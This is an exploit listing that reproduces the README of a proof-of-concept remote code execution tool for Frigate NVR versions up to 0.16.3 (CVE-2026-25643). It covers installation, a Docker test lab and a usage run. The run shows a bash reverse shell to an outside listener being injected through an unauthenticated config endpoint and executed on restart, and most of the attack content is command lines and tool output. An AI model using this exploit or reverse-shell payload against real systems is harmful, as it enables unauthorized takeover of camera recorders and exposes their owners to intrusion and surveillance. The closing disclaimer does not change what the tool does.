Share
## https://sploitus.com/exploit?id=20EA02CB-C9C6-536C-917F-649A3D5CBC36
Frigate NVR โ‰ค 0.16.3 Blind RCE Exploit (CVE-2026-25643) PoC


    
    
      
    


## ๐Ÿ“œ Description 
This Python exploit targets a critical configuration manipulation vulnerability in Frigate NVR versions up to 0.16.3 (both authenticated and unauthenticated paths). By injecting a malicious go2rtc stream and a fake camera entry, it triggers arbitrary command execution as the Frigate process during service restart โ€” no reverse shell or output capture required.

## ๐Ÿ› ๏ธ Installation
> [!NOTE]
> To ensure a clean and isolated environment for the project dependencies, it's recommended to use Python's `venv` module.

### OSX/Linux
```bash
git clone https://github.com/joshuavanderpoll/CVE-2026-25643.git
cd CVE-2026-25643
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
```

### Windows
```bash
git clone https://github.com/joshuavanderpoll/CVE-2026-25643.git
cd CVE-2026-25643
python -m venv .venv 
.venv\Scripts\activate
pip3 install -r requirements.txt
```

## โš™๏ธ Usage
```bash
python3 CVE-2026-25643.py -c "bash -i >& /dev/tcp/host.docker.internal/1111 0>&1" --url http://localhost:5001/

 Target : http://localhost:5001
 Command: bash -i >& /dev/tcp/host.docker.internal/1111 0>&1

[!] No credentials provided โ†’ pattempting unauthenticated access
[*] Fetching current configuration (/api/config/raw) ...
[*] Config fetch โ†’ HTTP 200
[*] Received 914 bytes
[*] Config was JSON-wrapped โ†’ unwrapped
[+] Config parsed successfully (7 top-level keys)
[*] Preparing payload โ†’ executing: bash -i >& /dev/tcp/host.docker.internal/1111 0>&1
[*] Using payload: bash -c 'bash -i >& /dev/tcp/host.docker.internal/1111 0>&1'
[+] Injected malicious stream โ†’ debug_cmd
[+] Injected trigger camera โ†’ trigger_exec
[*] Sending modified config (861 bytes) with option: restart
[*] Config save โ†’ HTTP 200
[+] Configuration accepted (server should restart)

============================================================
 Payload sent! Command should execute during go2rtc init / camera probe.
 Keep in mind:
 โ€ข Output is NOT captured (blind execution)
 โ€ข Command runs as the user/frigate process
 โ€ข Multiple executions may occur during restart
============================================================
```

## ๐Ÿ‹ Docker PoC
```bash
cd docker/
docker compose down
docker compose up -d
# You can test at --url http://127.0.0.1:5001
```

## ๐Ÿ’ป Example
![Execute PoC](/assets/execute.jpg)
![Receive connection](/assets/listener.jpg)

## ๐Ÿ•ต๐Ÿผ References
- Inspiration from https://github.com/jduardo2704/CVE-2026-25643-Frigate-RCE

## ๐Ÿ“ข Disclaimer
This tool is provided for educational and research purposes only. The creator assumes no responsibility for any misuse or damage caused by the tool.